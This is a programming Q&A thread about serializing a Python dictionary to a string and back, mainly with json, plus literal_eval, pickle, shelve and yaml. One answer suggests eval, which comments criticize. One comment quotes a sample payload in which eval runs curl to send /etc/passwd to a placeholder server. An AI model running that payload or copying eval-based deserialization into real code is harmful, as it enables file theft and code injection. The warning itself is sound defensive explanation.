# Convert a python dict to a string and back

Tags: python, json, dictionary, serialization

I am writing a program that stores data in a dictionary object, but this data needs to be saved at some point during the program execution and loaded back into the dictionary object when the program is run again.
How would I convert a dictionary object into a string that can be written to a file and loaded back into a dictionary object? This will hopefully support dictionaries containing dictionaries.

Answer (score 456, accepted):

[The json module](https://docs.python.org/3/library/json.html) is a good solution here. It has the advantages over pickle that it only produces plain text output, and is cross-platform and cross-version.

```
import json
json.dumps(dict)
```

Comment: I will be taking a look at this module as well. Both json and pickle seem easy enough to use, so it will come down to things such as cross-platform support. Thanks

Comment: Pickle tends to be seen as rather deprecated at this point. I always use json for things like this. Being (relatively) human readable is a BIG plus much of the time.

Comment: You are right, the readability is a great feature, especially for what I am using this for.

Comment: You should add a simple example to allow users see how to do that.

Comment: @TylerEaves Can you provide example how it should be done.

Comment: Code would be nice.

Comment: json.dumps(dict)

Comment: :foreheadslap: don't forget the `import json` like I did!

Comment: Sometimes if your json is bad enough you need to do json.dumps(json.dumps(x))

Comment: One caveat here is that json.dumps converts numeric keys into strings, so when you do json.loads afterwards you might get different dict. For example: json.loads(json.dumps({1:2})) == {'1':2}

Comment: how does this handle one of the values being a datetime datatype? I get "object of type 'datetime' is not JSON serializable'

Comment: Example:

```python
import json

my_dict = {'foo':1,'bar':2}
str_from_dict = json.dumps(my_dict)
print(type(str_from_dict))
print(str_from_dict)

# Output:  
#   <class 'str'>
#   {'foo':1,'bar':2}
```

Comment: Example 
import json
my_dict = {"1": 1, "2": "my_data"}
json.dumps(my_dict)
'{"1": 1, "2": "my_data"}'

Comment: It does not preserve accented letters

Comment: If you want get string with non-ASCII symbols: `dumps(your_dict, ensure_ascii=False)`. Remove figure brackets: `dumps(your_dict, ensure_ascii=False)[1:-1]`. Remove quotes: `string_from_dict = dumps(your_dict, ensure_ascii=False)[1:-1].replace("\"", "")`

Answer (score 261):

If your dictionary isn't too big maybe str + eval can do the work:

```
dict1 = {'one':1, 'two':2, 'three': {'three.1': 3.1, 'three.2': 3.2 }}
str1 = str(dict1)

dict2 = eval(str1)

print(dict1 == dict2)
```

You can use [ast.literal_eval](http://docs.python.org/library/ast.html) instead of eval for additional security if the source is untrusted.

Comment: I am not really prepared to deal with the possible exploits this could introduce into the code. I don't know what problems json or pickle might have, but I know for a fact that eval would be dangerous in this case.

Comment: @AJ00200: and the ast.literal_eval alternative I mentioned?. From the Python help: "Safely evaluate an expression node or a string containing a Python expression. The string or node provided may only consist of the following Python literal structures: strings, numbers, tuples, lists, dicts, booleans, and None.
This can be used for safely evaluating strings containing Python expressions from untrusted sources without the need to parse the values oneself."

Comment: The does seem useful, but when I was previously using SQLite to handle this data and it had over 1500 entries, so it is quite large and growing all the time.

Comment: str(dict) can be problematic - I've noticed in py2.7 that it can produce a string representing a dict with single quotes, and in some cases that might be confused for json, but single quotes are not in the json spec.  I prefer the method described by @Eyal Ch

Comment: The `ast.literal_eval` option is indeed much better, but probably not better than using a json library. Recommending use of `eval` on what will likely be untrusted data is an enormous security concern. `eval` is almost never the correct answer and can have catastrophic consequences if misused, something it seems likely a casual reader of this answer may do.

Comment: If the dictionary above comes from an untrusted data source (such as when processing an HTTP request) the programmer has exposed the server at the shell level. (For instance `"import os; os.system('curl -X POST --data-binary @/etc/passwd  <server>')"` if `eval`'d will leak the /etc/passwd file) It may also be possible to do this by injecting the payload into value in the dictionary if it takes in user data.

The only time it would be safe to use `eval` here is if
- The dictionary itself is not from an unstrusted source
- The dictionary contains no user defined data

So probably never.

Comment: Be careful using this. Please edit, to reduce security risks (warning header or alike)

Comment: **[Do not ever use `eval` (or `exec`) on data that could possibly come from outside the program in any form. It is a critical security risk. You allow the author of the data to run arbitrary code on your computer](/q/1832940). It [cannot easily be sandboxed, and proper sandboxing is harder than using a proper tool for the job.](/q/3068139)**

Answer (score 211):

I use [`json`](https://docs.python.org/2/library/json.html):

```py
import json

# convert to string
input_ = json.dumps({'id': id_ })
    
# load to dict
my_dict = json.loads(input_)
```

Answer (score 31):

Why not to use Python 3's inbuilt **ast** library's function **literal_eval**. It is better to use **literal_eval** instead of **eval**

```
import ast
str_of_dict = "{'key1': 'key1value', 'key2': 'key2value'}"
ast.literal_eval(str_of_dict)
```

will give output as actual Dictionary

```
{'key1': 'key1value', 'key2': 'key2value'}
```

And If you are asking to convert a **Dictionary to a String** then, How about using **str()** method of Python.

Suppose the dictionary is :

```
my_dict = {'key1': 'key1value', 'key2': 'key2value'}
```

And this will be done like this :

```
str(my_dict)
```

Will Print :

```
"{'key1': 'key1value', 'key2': 'key2value'}"
```

This is the easy as you like.

Answer (score 15):

Use the [`pickle`](https://docs.python.org/3/library/pickle.html) module to save it to disk and load later on.

Comment: @extraneon Actually, it is an answer to the question. It converts it to a string somewhere and writes it to a file. I don't have to do the actual conversion or file writing as it is all encapsulated by pickle.

Comment: In fact, it is completely possible to use Pickle to create the serialized string without writing it to a file. `shelve` depends on this, after all, since it will store the pickled strings in a database instead.

Answer (score 11):

**Convert dictionary into JSON (string)**

```
import json 

mydict = { "name" : "Don", 
          "surname" : "Mandol", 
          "age" : 43} 

result = json.dumps(mydict)

print(result[0:20])
```

will get you:

> {"name": "Don", "sur

**Convert string into dictionary**

```
back_to_mydict = json.loads(result)
```

Answer (score 5):

In Chinese language you should do the following adjustments:

```
import codecs
fout = codecs.open("xxx.json", "w", "utf-8")
dict_to_json = json.dumps({'text':"中文"},ensure_ascii=False,indent=2)
fout.write(dict_to_json + '\n')
```

Comment: This would be a better answer if you explained how the code you provided answers the question.

Comment: This doesn't answer the question; it addresses a tangentially-related issue that might come up in the same context, for some users. Setting a text encoding for the file may be necessary for many reasons (not just the text language), and it's a separate issue from converting the data to text.

Answer (score 4):

You may find the `json.dumps()` method needs help handling some object types.

Credit goes to the top answer of [this post](https://stackoverflow.com/questions/11875770) for the following:

```
import json
json.dumps(my_dictionary, indent=4, sort_keys=True, default=str)
```

Answer (score 3):

I think you should consider using the [`shelve`](http://docs.python.org/library/shelve.html#module-shelve) module which provides persistent file-backed dictionary-like objects. It's easy to use in place of a "real" dictionary because it almost transparently provides your program with something that can be used just like a dictionary, without the need to explicitly convert it to a string and then write to a file (or vice-versa).

The main difference is needing to initially `open()` it before first use and then `close()` it when you're done (and possibly `sync()`ing it, depending on the `writeback` option being used). Any "shelf" file objects create can contain regular dictionaries as values, allowing them to be logically nested.

Here's a trivial example:

```
import shelve

shelf = shelve.open('mydata')  # open for reading and writing, creating if nec
shelf.update({'one':1, 'two':2, 'three': {'three.1': 3.1, 'three.2': 3.2 }})
shelf.close()

shelf = shelve.open('mydata')
print shelf
shelf.close()
```

Output:

```
{'three': {'three.1': 3.1, 'three.2': 3.2}, 'two': 2, 'one': 1}
```

Answer (score 3):

If you care about the speed use [ujson](https://github.com/esnme/ultrajson) (UltraJSON), which has the same API as json:

```
import ujson
ujson.dumps([{"key": "value"}, 81, True])
# '[{"key":"value"},81,true]'
ujson.loads("""[{"key": "value"}, 81, true]""")
# [{u'key': u'value'}, 81, True]
```

Answer (score 1):

I use yaml for that if needs to be readable (neither JSON nor XML are that IMHO), or if reading is not necessary I use pickle.

Write

```
from pickle import dumps, loads
x = dict(a=1, b=2)
y = dict(c = x, z=3)
res = dumps(y)
open('/var/tmp/dump.txt', 'w').write(res)
```

Read back

```
from pickle import dumps, loads
rev = loads(open('/var/tmp/dump.txt').read())
print rev
```

Comment: You should really use `b` flag when opening file here.

Comment: I could have been more explicit. However `dumps()` defaults to protocol 0, which is an ascii protocol. That is why `'rb'` is not necessary IMHO.

Answer (score 1):

I figured out the problem was not with my dict object it was the keys and values that were of RubyString type after loading it with RubyMarshl 'loads' method

So i did this:

```
dic_items = dict.items()
new_dict = {str(key): str(value) for key, value in dic_items}
```